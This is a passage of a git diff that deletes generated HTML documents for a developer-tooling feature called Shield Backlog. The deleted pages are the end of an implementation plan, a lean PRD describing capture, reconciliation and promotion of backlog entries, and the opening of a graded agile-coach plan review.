-<li><strong>Tasks:</strong> fixtures <strong>from the real artifact schemas</strong> (P0-1: list-keyed <code>manifest.features[]</code>, boolean <code>plan_json</code> flag) covering prd-only-stays, plan-committed-removed, ambiguous-stays (epic-name collision across features), malformed-stays, <strong>re-planned-epic-reorder-still-resolves</strong> (same name, new <code>EPIC-N</code> — P0-2); evals incl. duplicate-id rejection; <strong>concurrency/lost-update eval</strong> (P1-1: a concurrent on-disk change between read and <code>os.replace()</code> is refused with <code>BacklogInvalid</code> — no corruption, no lost entry); <strong>write-side eval</strong> (P1-b: <code>capture()</code> producing a schema-invalid doc refuses, byte-unchanged); <strong>no-stamping eval (F6)</strong>; <strong>recovery-rehearsal eval</strong> (P1-c: crash at the ordering seam — after log-append, before remove — still recoverable via replay); name a <strong>concrete CI entrypoint</strong> (the actual workflow file + runner) + path-filter glob (<code>shield/{schema,scripts,skills/general/backlog}/**</code>, <code>shield/commands/backlog.md</code>).</li>
-<li><strong>AC:</strong> suite under <code>shield/evals/</code> covers all listed behaviors (incl. re-plan reorder, lost-update detection, write-side refusal, ordering-seam recovery); fixtures use real manifest/plan shapes; self-contained (no API/LLM); PR body has RED + GREEN; the named CI workflow runs on the backlog-asset glob.</li>
-<li><strong>Design:</strong> <a href="../trd.md#milestones">§10 Milestones</a></li>
-</ul>
-<h3 id="epic-4-s2--version-bump--commandskill-docs-medium">EPIC-4-S2 · Version bump + command/skill docs <em>(medium)</em></h3>
-<p>Bump the Shield plugin version (marketplace.json + pyproject where touched) in the same commit as asset changes; finalize <code>/backlog</code> + backlog SKILL.md docs.</p>
-<ul>
-<li><strong>Tasks:</strong> bump <code>marketplace.json</code>; bump <code>backlog_store</code> <code>pyproject.toml</code> (<strong>unconditional</strong> — P1-4, it's a packaged module); commit the <code>shield/schemas/shield.schema.json</code> <code>backlog</code> change (P0-3) in the same commit; finalize command/skill docs (capture, three triggers, kill switch, <strong>name</strong> match key, manual remove, badges, <strong>wrong-removal recovery procedure</strong>); document a <strong>fixed monthly</strong> <code>/backlog</code> audit with the concrete PRD §7 revisit triggers (&lt;70% terminal in 30d, or &gt;20% untouched &gt;60d); add explicit DoD lines (&quot;PR reviewed and merged&quot;, &quot;marketplace version published&quot;); CHANGELOG.</li>
-<li><strong>AC:</strong> version bumped in <code>marketplace.json</code> + <code>backlog_store</code> <code>pyproject.toml</code> and the <code>shield.schema.json</code> change committed, all in one commit; command + SKILL document capture/view/promote/remove + 3 triggers + kill switch + recovery procedure + fixed monthly audit with numeric triggers; explicit DoD lines present; CHANGELOG mentions the feature.</li>
-<li><strong>Design:</strong> <a href="../trd.md#references">§13 References</a></li>
-</ul>
-<hr />
-<h2 id="validate-the-bet-from-v1-data--p1--pm10-decided-2026-05-27">Validate the bet from v1 data  <em>(P1 — PM10, decided 2026-05-27)</em></h2>
-<p>No pre-build baseline gate. The load-bearing assumption (PRD §10: lost future-work volume is high enough to justify the tool) is <strong>accepted for v1</strong> and validated <em>after</em> M1 ships, from <code>backlog.json</code>'s own add/remove git history over the first 30 days (the §7 success metric). If that data shows the backlog isn't earning its keep, revisit scope before investing further in M2/M3.</p>
-<h2 id="carried-forward-from-prd-review-ready-run-_2">Carried forward from PRD-review (Ready, run _2)</h2>
-<ul>
-<li>Capture-from-skill interface defined → <strong>EPIC-1-S2</strong> / TRD §11 (closed — F3 signature locked).</li>
-<li><code>backlog.json</code> <code>schema_version</code> + migration → <strong>EPIC-1-S1</strong> / TRD §9.</li>
-<li>Reconciliation read-contract drift tolerance → <strong>EPIC-3-S2</strong> / TRD §6 N3.</li>
-<li>Eager-prune + lazy-sweep idempotency → <strong>EPIC-3-S3</strong> / TRD §5 F9.</li>
-</ul>
-<h2 id="next-steps">Next steps</h2>
-<ul>
-<li><code>/plan-review</code> — re-run multi-agent review on the refreshed plan + new TRD.</li>
-<li><code>/pm-sync</code> — sync epics + stories to ClickUp.</li>
-<li><code>/implement</code> — begin TDD implementation at M1 / EPIC-1-S1.</li>
-</ul>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/prd.html b/docs/shield/backlog-20260527/outputs/prd.html
deleted file mode 100644
index 928f91ec..00000000
--- a/docs/shield/backlog-20260527/outputs/prd.html
+++ /dev/null
@@ -1,392 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>PRD — backlog-20260527</title>
-<link rel="stylesheet" href="../../shield.css" />
-<script defer src="../../manifest.js"></script>
-<script defer src="../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../">
-<header class="shield-header">
-  <a class="brand" href="../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#1-header">1. Header</a>
-</li>
-<li><a href="#2-terminologies">2. Terminologies</a>
-</li>
-<li><a href="#3-problem--context">3. Problem &amp; context</a>
-</li>
-<li><a href="#4-target-users--personas">4. Target users / personas</a>
-</li>
-<li><a href="#5-architecture--flows">5. Architecture &amp; flows</a>
-</li>
-<li><a href="#6-goals--non-goals">6. Goals &amp; non-goals</a>
-<ul>
-<li><a href="#goals">Goals</a></li>
-<li><a href="#non-goals">Non-goals</a></li>
-</ul>
-</li>
-<li><a href="#7-success-metrics">7. Success metrics</a>
-</li>
-<li><a href="#8-milestones">8. Milestones</a>
-</li>
-<li><a href="#9-open-questions">9. Open questions</a>
-<ul>
-<li><a href="#decided-locked-for-v1">Decided (locked for v1)</a></li>
-<li><a href="#still-open">Still open</a></li>
-</ul>
-</li>
-<li><a href="#10-risks--assumptions">10. Risks &amp; assumptions</a>
-<ul>
-<li><a href="#risks">Risks</a></li>
-<li><a href="#assumptions">Assumptions</a></li>
-</ul>
-</li>
-<li><a href="#11-out-of-scope--non-goals">11. Out of scope / Non-goals</a>
-</li>
-</ul>
-</nav>
-<h1 id="shield-backlog">Shield Backlog</h1>
-<h2 id="1-header">1. Header</h2>
-<table>
-<thead>
-<tr>
-<th>Field</th>
-<th>Value</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Owner</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Status</td>
-<td>Draft</td>
-</tr>
-<tr>
-<td>PRD type</td>
-<td>Lean</td>
-</tr>
-<tr>
-<td>Date created</td>
-<td>2026-05-27</td>
-</tr>
-<tr>
-<td>Last updated</td>
-<td>2026-05-27</td>
-</tr>
-<tr>
-<td>Linked design spec</td>
-<td>null</td>
-</tr>
-<tr>
-<td>Linked research</td>
-<td>null</td>
-</tr>
-<tr>
-<td>Decision-maker</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Sign-off contacts</td>
-<td><em>(n/a for internal tooling)</em></td>
-</tr>
-<tr>
-<td>Linked plans</td>
-<td><em>(auto-populated by /plan)</em></td>
-</tr>
-</tbody>
-</table>
-<h2 id="2-terminologies">2. Terminologies</h2>
-<table>
-<thead>
-<tr>
-<th>Term</th>
-<th>Definition</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Backlog</td>
-<td>A project-level, ordered list of future work captured across the Shield workflow. Lives at <code>docs/shield/backlog.json</code>.</td>
-</tr>
-<tr>
-<td>Backlog entry</td>
-<td>One captured idea — a future epic, story, or task. May not be actionable when captured. Carries an order, a <code>kind</code> hint (<code>epic</code> | <code>story</code> | <code>task</code>), a source (<code>user</code> | <code>agent</code>), and a <strong>feature + epic association</strong> (either may be proposed-new until promotion).</td>
-</tr>
-<tr>
-<td>Feature association</td>
-<td>The feature an entry belongs to (a <code>docs/shield/&lt;feature&gt;/</code> folder). It is the <strong>reconciliation key</strong>: <code>manifest.json</code> is keyed by feature, so this is how an entry is matched to its pipeline progress. May be proposed-new until promotion.</td>
-</tr>
-<tr>
-<td>Epic association</td>
-<td>The epic an entry slots into when planned — an existing epic id (e.g. <code>EPIC-2</code>) or a proposed new epic. Acts as the <strong>gate</strong> at reconciliation: the entry is removed when this epic's work appears in the feature's <code>plan.json</code> (or removed manually — see §9).</td>
-</tr>
-<tr>
-<td>Promotion</td>
-<td>Acting on a backlog entry by starting the appropriate Shield step for it — <code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>. <strong>The user decides which step</strong>; the backlog does not auto-route.</td>
-</tr>
-<tr>
-<td>Reconciliation</td>
-<td>Keeping the backlog current: <code>manifest.json</code> locates the entry's feature and whether it has a <code>plan.json</code>; if so, the entry's epic is looked up there. The entry is removed once its epic's work appears in the feature's <code>plan.json</code> (<code>epics[].stories[]</code>). No ids are stamped — matching is by feature (manifest) + epic (plan): an existing-epic entry matches by <strong>epic id</strong>, a proposed-new-epic entry matches by <strong>epic name</strong> (names expected stable). On any ambiguity or no match, the entry stays — reconciliation never removes on doubt. A <code>prd</code>-only feature does <strong>not</strong> trigger removal. Removal fires at the end of the <code>/plan</code> or <code>/implement</code> run promoted from the entry, or on the <code>/backlog</code> view sweep.</td>
-</tr>
-<tr>
-<td>Agent-discovered entry</td>
-<td>A backlog entry the agent adds on its own when it notices future work mid-task (vs. a user-created entry).</td>
-</tr>
-</tbody>
-</table>
-<h2 id="3-problem--context">3. Problem &amp; context</h2>
-<p>Future work surfaces constantly while using Shield — during <code>/research</code>, while writing a PRD, mid-<code>/plan</code>, and especially during <code>/implement</code> (&quot;we should also handle X later&quot;, &quot;this whole area needs a rewrite&quot;). Today there is <strong>nowhere to park that work</strong>. The options are bad: derail the current task to chase it, or drop it in a comment / memory / someone's head and lose it.</p>
-<p>Concretely:</p>
-<ul>
-<li>There is no project-level, ordered place to capture &quot;not now, but later&quot; items. <code>plan.json</code> only holds work already committed to a milestone; <code>manifest.json</code> is an artifact index. Neither captures un-triaged future work.</li>
-<li>Ideas discovered by the agent mid-task have no home — they're mentioned once in conversation and gone.</li>
-<li>When future work <em>is</em> remembered, there's no consistent path from &quot;loose idea&quot; to &quot;stories in a plan.&quot; Each pickup re-derives the epic, the feature, and the scope from scratch.</li>
-</ul>
-<p>Why now: Shield's pipeline (<code>/research → /prd → /plan → /implement</code>) is mature, but it only handles work that's <em>already</em> been decided on. The gap is the staging area <em>before</em> that pipeline — where future work waits, ordered, until the user promotes it in.</p>
-<h2 id="4-target-users--personas">4. Target users / personas</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Persona</th>
-<th>Goals</th>
-<th>Frictions today</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>Ashwini — Shield maintainer running <code>/research</code>/<code>/plan</code>/<code>/implement</code> daily</td>
-<td>Capture future work without losing focus on the current task; come back later to an ordered list of what to pick up next</td>
-<td>Future ideas get lost or derail the current task; no ordered &quot;later&quot; list at the project level</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>The agent (Claude) running a Shield task</td>
-<td>Record follow-up work it discovers mid-task so the human doesn't have to remember it</td>
-<td>Discovered work is mentioned once in chat then forgotten; no place to persist it</td>
-</tr>
-</tbody>
-</table>
-<h2 id="5-architecture--flows">5. Architecture &amp; flows</h2>
-<p>A single global store <code>docs/shield/backlog.json</code> (sibling to <code>manifest.json</code>), a <code>/backlog</code> command to view it, a capture path usable from any Shield skill or by the user, and a <strong>user-driven promotion</strong>: the user picks an entry and starts whichever Shield step fits — <code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>. Each entry carries an order, a source (<code>user</code> | <code>agent</code>), and a <strong>feature + epic association</strong>. <strong>Reconciliation</strong> reads <code>manifest.json</code> as the project-level index — to find each entry's feature, see whether it has a <code>plan.json</code>, and surface its pipeline status (research/prd/plan) in the <code>/backlog</code> view — then opens the flagged <code>plan.json</code> and removes any entry whose epic's work now appears there. A <code>prd</code>-only feature stays in the backlog; only committed work is removed. No ids are tracked. An entry promoted via <code>/plan</code> or <code>/implement</code> is pruned at the <strong>end of that run</strong> (the command carries the entry as a transient promotion reference); the <code>/backlog</code> view sweep is the lazy safety net for work that landed without an explicit reference; and a <strong>manual remove</strong> clears ideas decided against or anything not tied to a promotion run.</p>
-<pre class="mermaid">flowchart LR
-  cap[&quot;Capture&lt;br/&gt;(user or agent, anytime)&quot;] --&gt; bl[&quot;backlog.json&lt;br/&gt;(ordered, project-level)&quot;]
-  bl --&gt; view[&quot;/backlog&lt;br/&gt;(ordered list +&lt;br/&gt;per-entry pipeline status)&quot;]
-  man[&quot;manifest.json&lt;br/&gt;(feature index:&lt;br/&gt;research/prd/plan)&quot;] --&gt; view
-  bl --&gt; dec{&quot;User decides&lt;br/&gt;next step&quot;}
-  dec --&gt; research[&quot;/research&quot;]
-  dec --&gt; prd[&quot;/prd&quot;]
-  dec --&gt; plan[&quot;/plan&quot;]
-  dec --&gt; impl[&quot;/implement&quot;]
-  man --&gt; rec[&quot;Reconcile → remove from backlog:&lt;br/&gt;end of promoted /plan or /implement,&lt;br/&gt;or /backlog sweep (work now in plan.json)&quot;]
-  plan --&gt; rec
-  impl --&gt; rec
-  rec --&gt; bl
-</pre>
-<h2 id="6-goals--non-goals">6. Goals &amp; non-goals</h2>
-<h3 id="goals">Goals</h3>
-<ul>
-<li>Capture future work (epic / story / task granularity) at <strong>any point</strong> in the workflow — before a PRD exists, during planning, during implementation — without derailing the current task.</li>
-<li>Support <strong>both</strong> capture sources: user-created and agent-discovered.</li>
-<li>Keep the backlog <strong>ordered</strong> so there's a clear &quot;what to pick up next.&quot;</li>
-<li>Every entry is <strong>associated with a feature and an epic</strong> — existing or proposed-new — and the agent <strong>suggests a matching feature/epic</strong> at capture or promotion time.</li>
-<li>A <code>/backlog</code> command <strong>shows the current backlog</strong>, ordered, with each entry's feature + epic association, source, and <strong>pipeline status (research / prd / plan, read from <code>manifest.json</code>)</strong> — so you can see what's been started (e.g. a prd written) without the entry being removed.</li>
-<li>Provide a <strong>user-driven promotion path</strong>: the user picks an entry and starts the Shield step they judge appropriate (<code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>). The backlog suggests, but does not dictate, the next step.</li>
-<li><strong>Keep the backlog current</strong>: an entry promoted via <code>/plan</code> or <code>/implement</code> is removed at the end of that run; the <code>/backlog</code> view also sweeps out any entry whose work has since landed in a <code>plan.json</code>. The backlog reflects only not-yet-committed work.</li>
-<li><strong>Manual remove</strong>: any entry can be explicitly removed from <code>/backlog</code> — covers ideas decided against and entries not cleared by a promotion run.</li>
-</ul>
-<h3 id="non-goals">Non-goals</h3>
-<ul>
-<li><strong>Automatic end-of-task surfacing machinery</strong> (hooks). The agent already calls out new entries conversationally; no dedicated surfacing mechanism in v1.</li>
-<li><strong>Per-feature backlogs.</strong> v1 is a single global backlog.</li>
-<li><strong>A status/workflow engine.</strong> The lifecycle is minimal: an entry exists until it is removed — at the end of the <code>/plan</code> or <code>/implement</code> it was promoted from, by the <code>/backlog</code> sweep once its work is in a <code>plan.json</code>, or manually. No multi-state machine.</li>
-<li><strong>Syncing the backlog to the PM tool</strong> (ClickUp/Jira/etc.). The backlog is a pre-pipeline staging area; PM sync happens after promotion, via the existing <code>/pm-sync</code> on the resulting plan.</li>
-<li><strong>Replacing the PM tool's own backlog.</strong> This is Shield-local triage, not a project-management backlog of record.</li>
-</ul>
-<h2 id="7-success-metrics">7. Success metrics</h2>
-<table>
-<thead>
-<tr>
-<th>Metric</th>
-<th>Type</th>
-<th>Target</th>
-<th>Counter</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Captured entries that get acted on (work started, or removed once it lands in a plan) vs. left to rot</td>
-<td>Outcome</td>
-<td>≥70% reach a terminal state (promoted/landed in a plan, or explicitly dropped) within 30 days; &lt;20% sit untouched &gt;60 days</td>
-<td>Entries pile up un-triaged → backlog becomes a graveyard</td>
-</tr>
-<tr>
-<td>Entries carrying a feature + epic association at promotion time</td>
-<td>Quality</td>
-<td>100% — promotion cannot complete without a feature and epic</td>
-<td>Forcing association makes capture so heavy nobody captures</td>
-</tr>
-<tr>
-<td>Agent feature/epic-suggestion acceptance</td>
-<td>Quality</td>
-<td>≥60% of agent feature/epic suggestions accepted without override</td>
-<td>Bad suggestions that users routinely override</td>
-</tr>
-<tr>
-<td>Capture friction</td>
-<td>Adoption</td>
-<td>Capture is a single <code>/backlog add</code> (or one agent action) and never blocks the current task</td>
-<td>Capture is so quick the backlog fills with low-signal noise</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Measurement (v1):</strong> no telemetry — metrics are tracked manually via a periodic <code>/backlog</code> audit and the git history of <code>backlog.json</code> (entry add/remove commits). Owner: @ashwinimanoj.</p>
-<h2 id="8-milestones">8. Milestones</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Name</th>
-<th>Outcome</th>
-<th>Exit criteria</th>
-<th>Depends on</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>M1</td>
-<td>Capture + store + view</td>
-<td>A global <code>backlog.json</code> exists; entries can be added (user + agent) with order, source, and feature + epic association; <code>/backlog</code> shows the ordered list with per-entry pipeline status from <code>manifest.json</code></td>
-<td><code>backlog.json</code> schema defined; an entry can be captured from a skill or by the user; <code>/backlog</code> renders the ordered backlog with feature + epic and a research/prd/plan status read from <code>manifest.json</code>; an entry can be manually removed from <code>/backlog</code></td>
-<td>—</td>
-</tr>
-<tr>
-<td>M2</td>
-<td>Feature + epic association + suggestion</td>
-<td>Every entry references a feature and an epic (existing or proposed new); the agent suggests a matching feature/epic</td>
-<td>Capture prompts for a feature + epic; agent scans <code>manifest.json</code> features and known epics and proposes a match; user can accept, pick another, or create-new</td>
-<td>M1</td>
-</tr>
-<tr>
-<td>M3</td>
-<td>Promotion + reconciliation</td>
-<td>The user picks an entry and starts the Shield step they choose (<code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>); once the entry's epic's work appears in the feature's <code>plan.json</code>, it is removed from the backlog</td>
-<td>Reconciliation uses <code>manifest.json</code> (find feature, has-plan?) + <code>plan.json</code> (epic present?) — no ids stamped; a <code>prd</code>-only feature is <strong>not</strong> removed; removal fires eagerly at the end of the <code>/plan</code> or <code>/implement</code> run promoted from the entry and lazily on the <code>/backlog</code> sweep; the user-chosen step is never overridden</td>
-<td>M2</td>
-</tr>
-</tbody>
-</table>
-<h2 id="9-open-questions">9. Open questions</h2>
-<h3 id="decided-locked-for-v1">Decided (locked for v1)</h3>
-<ul>
-<li><strong>Reconciliation triggers:</strong> an entry is removed (a) <strong>eagerly</strong> at the end of the <code>/plan</code> or <code>/implement</code> run it was promoted <em>from</em> — the entry id is passed to the command as a transient promotion reference, and the entry is pruned on success; and (b) <strong>lazily</strong> by the <code>/backlog</code> view sweep, which prunes any entry whose epic's work is now in a <code>plan.json</code> (the safety net for work that landed without an explicit reference). The promotion reference is a runtime command argument, not an id stamped into <code>plan.json</code>.</li>
-<li><strong>Reconciliation match key:</strong> feature (via <code>manifest.json</code>) + epic. Existing-epic entries match by <strong>epic id</strong>; proposed-new-epic entries match by <strong>epic name</strong> (names expected stable). On ambiguity or no match, the entry stays — reconciliation never removes on doubt.</li>
-<li><strong>Ordering scheme:</strong> a single explicit integer <code>order</code> field per entry (like <code>orderindex</code>); no priority buckets in v1.</li>
-<li><strong>Entry granularity:</strong> entries carry a <code>kind</code> hint (<code>epic</code> | <code>story</code> | <code>task</code>); promotion always yields ≥1 story regardless of <code>kind</code>.</li>
-<li><strong>Shippable work routes through <code>/plan</code>:</strong> anything that produces stories is promoted via <code>/plan</code> so it lands in <code>plan.json</code> (the lazy-sweep signal) and is pruned at the end of that <code>/plan</code> run. Direct <code>/implement</code> stays available for rare tiny planless changes; when promoted from an entry, that entry is pruned at the end of the <code>/implement</code> run too.</li>
-<li><strong>Manual remove:</strong> <code>/backlog</code> supports explicitly removing an entry — for ideas decided against, or any entry not cleared by a promotion run (e.g. captured-then-abandoned). Removal is a plain delete; no retained history in v1.</li>
-</ul>
-<h3 id="still-open">Still open</h3>
-<ul>
-<li><strong>Feature/epic discovery cost.</strong> Epics live inside per-feature <code>plan.json</code>, so confirming an entry's epic means opening the plan the manifest flags as having one. (Leaning: manifest as the index, open only flagged <code>plan.json</code> files; add a project-level epic index only if this gets slow.)</li>
-<li><strong>Dropped/rejected entries.</strong> Do we need an explicit terminal state for &quot;decided against,&quot; or is deleting the entry enough? (Deferred — see §11 Out of scope.)</li>
-</ul>
-<h2 id="10-risks--assumptions">10. Risks &amp; assumptions</h2>
-<h3 id="risks">Risks</h3>
-<table>
-<thead>
-<tr>
-<th>Risk</th>
-<th>Mitigation</th>
-<th>Owner</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Backlog becomes a graveyard (captured, never acted on)</td>
-<td>Reconciliation prunes plan-committed work on <code>/backlog</code> view; periodic audit surfaces stale entries; §7 counter-metric tracks it</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Concurrent writes corrupt <code>backlog.json</code> (capture racing reconciliation)</td>
-<td>Atomic write (temp-then-rename); validate-or-refuse on read; <code>backlog.json</code> is git-tracked so corruption is revertable</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Reconciliation wrongly removes an entry (epic-name collision / ambiguous match)</td>
-<td>Match on feature + epic only; never remove on ambiguity (entry stays); <code>git revert</code> recovers any bad removal</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Capture friction too high → nobody captures</td>
-<td>Single-step capture; agent can capture without prompting</td>
-<td>@ashwinimanoj</td>
-</tr>
-</tbody>
-</table>
-<h3 id="assumptions">Assumptions</h3>
-<ul>
-<li><strong>(unvalidated)</strong> Agents reliably surface follow-up work conversationally — the entire no-hooks non-goal (§6) rests on this. Revisit if discovered work is still being lost after v1.</li>
-<li><strong>(unvalidated)</strong> The volume/loss of future-work items today is high enough to justify the tool — no baseline count has been measured; v1's own <code>backlog.json</code> history will validate it.</li>
-<li><strong>(assumed stable)</strong> Epic names in <code>plan.json</code> are stable enough to serve as the proposed-new-epic match key (see §9).</li>
-<li><strong>(validated)</strong> <code>manifest.json</code> is feature-keyed and <code>plan.json</code> carries <code>epics[].stories[]</code> — confirmed against the current schema.</li>
-</ul>
-<h2 id="11-out-of-scope--non-goals">11. Out of scope / Non-goals</h2>
-<ul>
-<li>Automatic end-of-task surfacing via hooks (the agent calls it out conversationally; revisit if that proves unreliable).</li>
-<li>Per-feature backlogs and a global↔per-feature promotion path.</li>
-<li>An audit trail / retained history for removed or declined entries (manual remove is a plain delete in v1 — the entry is gone, with no kept record).</li>
-<li><code>/pm-sync</code> of backlog entries to the PM tool before promotion.</li>
-<li>Cross-project / multi-repo backlogs.</li>
-<li>Reordering UX beyond editing the order field (no drag-and-drop, no auto-prioritization).</li>
-</ul>
-<hr />
-<blockquote>
-<p><strong>This is a lean PRD.</strong> It intentionally omits the following standard sections:</p>
-<ul>
-<li>Section 8 — User stories &amp; scenarios</li>
-<li>Section 9 — Functional requirements</li>
-<li>Section 10 — Non-functional requirements</li>
-<li>Section 11 — RBAC &amp; permissions matrix</li>
-<li>Section 12 — Dependencies</li>
-<li>Section 13 — Risks &amp; mitigations</li>
-<li>Section 14 — Assumptions</li>
-<li>Section 15 — Rollout plan (full — lean has its own §8 Milestones)</li>
-<li>Section 16 — Cost &amp; resource impact</li>
-<li>Section 17 — GTM &amp; customer-comms</li>
-<li>Section 18 — Support / CX impact</li>
-</ul>
-<p>If scope grows or stakeholders need more detail, run <code>/prd</code> again — Shield
-will offer to add specific sections or upgrade to <code>standard</code>.</p>
-</blockquote>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/agile-coach.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/agile-coach.html
deleted file mode 100644
index fa041797..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/agile-coach.html
+++ /dev/null
@@ -1,308 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="utf-8">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<title>Shield Plan Review</title>
-<style>
-  body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
-  h1,h2,h3{line-height:1.25;margin-top:1.6em}
-  h1{border-bottom:2px solid #e1e4e8;padding-bottom:.3em}
-  h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
-  code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em}
-  pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto}
-  pre code{background:none;padding:0}
-  table{border-collapse:collapse;width:100%;margin:1em 0}
-  th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top}
-  th{background:#f6f8fa}
-  blockquote{border-left:4px solid #d0d7de;margin:1em 0;padding:.2em 1em;color:#57606a}
-  .meta{background:#fff8e6;border:1px solid #f0d999;border-radius:8px;padding:.6em 1em;font-size:.9em;color:#6a5500}
-</style>
-</head>
-<body>
-<div class="meta">Shield Plan Review · feature <code>backlog-20260527</code> · 2026-05-27 · rendered from markdown (source of truth in <code>reviews/plan/2026-05-27/</code>)</div>
-<h1 id="agile-coach--detailed-findings">Agile Coach — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<h3 id="agile-coach-review-grade-b">Agile Coach Review (Grade: B)</h3>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Evaluation Point</th>
-<th>Grade</th>
-<th>Notes</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>AC1</td>
-<td>Story sizing</td>
-<td>A</td>
-<td>Ten stories, each a coherent single-sprint unit. Schema+validator, capture, view, remove, status badges, association+suggestion, promotion, reconciliation engine, triggers, evals, release each scoped to days not weeks. None trivial, none multi-week. EPIC-3-S2 (reconciliation engine) is the heaviest but still one focused unit.</td>
-</tr>
-<tr>
-<td>AC2</td>
-<td>Story independence</td>
-<td>B</td>
-<td>Good parallelism within M1 (S1 schema unblocks S2/S3/S4; S3 view and S4 remove can proceed in parallel once helper exists). EPIC-3-S3 hard-depends on EPIC-3-S2 (shared engine) and EPIC-3-S1 (transient reference) — correctly sequenced but tightly coupled; that coupling is inherent, not a defect.</td>
-</tr>
-<tr>
-<td>AC3</td>
-<td>Dependency ordering</td>
-<td>A</td>
-<td>Milestone chain M1→M2→M3 is explicit and acyclic. Blockers are stated: EPIC-3-S3 &quot;share the reconciliation engine&quot; depends on EPIC-3-S2; promotion (S1) precedes eager prune (S3); EPIC-2-S1 view-badges build on EPIC-1-S3 view (called out: &quot;Pipeline status badges are added in EPIC-2-S1&quot;). No circular deps.</td>
-</tr>
-<tr>
-<td>AC4</td>
-<td>Context completeness</td>
-<td>A</td>
-<td>Every story's <code>description</code> states why it exists, not just what. E.g. EPIC-1-S2 ties to a corruption-race rationale and explicitly &quot;resolves the PRD-review P1 'capture interface undefined'&quot;; EPIC-2-S1 explains the goal (&quot;show 'prd done, not yet planned' without being removed&quot;). Carried-forward PRD-review items mapped to stories.</td>
-</tr>
-<tr>
-<td>AC5</td>
-<td>Requirements clarity</td>
-<td>B</td>
-<td>Mostly specific and measurable: named validator errors (<code>unknown_kind_enum</code>, <code>missing_required_field</code>, <code>schema_version_too_new</code>), explicit field list, atomic temp-then-rename. Weaker spot: EPIC-2-S2 &quot;propose the best match&quot; leaves the matching algorithm undefined (no string-distance/heuristic spec) — deferred to a TODO LLD <code>epic-suggester</code>. AC6/AC7 partly compensate but the &quot;best match&quot; criterion is not measurable.</td>
-</tr>
-<tr>
-<td>AC6</td>
-<td>Implementation step quality</td>
-<td>B</td>
-<td>Steps say what and mostly how (e.g. &quot;write backlog.json.tmp then rename; on failure remove .tmp&quot;, &quot;pydantic + jsonschema, run via uv&quot;). Verification is largely pushed into the AC rather than into the steps themselves; e.g. EPIC-3-S2 steps describe behavior but no in-step verification checkpoint. Solid but not exemplary.</td>
-</tr>
-<tr>
-<td>AC7</td>
-<td>Acceptance criteria testability</td>
-<td>B</td>
-<td>Most AC are pass/fail verifiable by a third party (exit 0/non-zero with named error; &quot;killing capture mid-write leaves no corrupted backlog.json&quot;; &quot;second pass is a no-op&quot;). Two soft spots: EPIC-2-S2 &quot;proposes ≥1 feature and ≥1 epic candidate when matches exist&quot; — the &quot;best match&quot; quality isn't asserted; EPIC-3-S3 &quot;before the next /backlog view&quot; is a sequencing claim that's awkward to test deterministically. No vague &quot;performance is good&quot;-style criteria.</td>
-</tr>
-<tr>
-<td>AC8</td>
-<td>Sprint-readiness</td>
-<td>B</td>
-<td>M1 and M3 stories are pullable as-is. EPIC-2-S2 carries an open design question (suggestion match algorithm, TODO <code>/lld epic-suggester</code>) and PRD §9 flags &quot;Feature/epic discovery cost&quot; as still-open — a dev would need a planning conversation on the matching heuristic before estimating S2 confidently. Everything else is ready.</td>
-</tr>
-<tr>
